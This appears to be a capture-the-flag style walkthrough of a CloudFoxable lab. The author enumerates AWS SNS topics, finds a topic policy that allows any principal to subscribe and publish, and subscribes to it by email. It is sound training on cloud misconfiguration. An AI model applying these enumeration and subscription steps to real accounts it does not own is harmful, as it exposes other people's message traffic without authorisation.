What does it mean when we say something is “public” in the cloud? Do you need an IP address to be public? What if a resource is accessible to anyone in the world, provided they have an AWS account (any AWS account). That seems close enough to public to scare me!

Note: FWIW, there is a policy on the resource in question that will only allow you to exploit it from your IP address to prevent misuse)

There are two cloudfox commands that can help you here.

Information Gathering

The word “topic” gets me thinking of AWS SNS, so i’ll start enumerating topics there.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

adicpnn@laboratory cloud % aws sns list-topics --profile cloudfoxable
{
    "Topics": [
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:executioner"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:public"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:user-updates-topic"
        },
        {
            "TopicArn": "arn:aws:sns:eu-central-1:129323993607:user-updates-topic.fifo"
        }
    ]
}

Then, for each topic, I’ll look into it’s access policy.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

adicpnn@laboratory cloud % aws sns get-topic-attributes --topic-arn arn:aws:sns:eu-central-1:129323993607:eventbridge-sns --profile cloudfoxable
{
    "Attributes": {
        "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"snspolicy\",\"Statement\":[{\"Sid\":\"First\",\"Effect\":\"Allow\",\"Principal\":\"*\",\"Action\":[\"sns:Subscribe\",\"sns:Publish\"],\"Resource\":\"arn:aws:sns:eu-central-1:129323993607:eventbridge-sns\",\"Condition\":{\"IpAddress\":{\"aws:SourceIp\":\"nope\"}}}]}",
        "LambdaSuccessFeedbackSampleRate": "0",
        "Owner": "129323993607",
        "SubscriptionsPending": "0",
        "TopicArn": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns",
        "EffectiveDeliveryPolicy": "{\"http\":{\"defaultHealthyRetryPolicy\":{\"minDelayTarget\":20,\"maxDelayTarget\":20,\"numRetries\":3,\"numMaxDelayRetries\":0,\"numNoDelayRetries\":0,\"numMinDelayRetries\":0,\"backoffFunction\":\"linear\"},\"disableSubscriptionOverrides\":false,\"defaultRequestPolicy\":{\"headerContentType\":\"text/plain; charset=UTF-8\"}}}",
        "FirehoseSuccessFeedbackSampleRate": "0",
        "SubscriptionsConfirmed": "0",
        "SQSSuccessFeedbackSampleRate": "0",
        "HTTPSuccessFeedbackSampleRate": "0",
        "ApplicationSuccessFeedbackSampleRate": "0",
        "DisplayName": "",
        "SubscriptionsDeleted": "0"
    }
}

This might not be apparent at first sight, but the topic policy allows anyone to subscribe to it!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21

{
  "Version": "2012-10-17",
  "Id": "snspolicy",
  "Statement": [
    {
      "Sid": "First",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "sns:Subscribe",
        "sns:Publish"
      ],
      "Resource": "arn:aws:sns:eu-central-1:129323993607:eventbridge-sns",
      "Condition": {
        "IpAddress": {
          "aws:SourceIp": "nope"
        }
      }
    }
  ]
}

Execution

I’ll proceed with subscribing to the topic via email, making sure I confirm the subscribtion first

1
2
3
4

adicpnn@laboratory cloud % aws sns subscribe --topic-arn arn:aws:sns:eu-central-1:129323993607:eventbridge-sns --notification-endpoint email@.com --protocol email --profile cloudfoxable
{
    "SubscriptionArn": "pending confirmation"
}

Confirmation email for AWS SNS topic

After a quick wait, a notification message should pop up.

AWS Notification image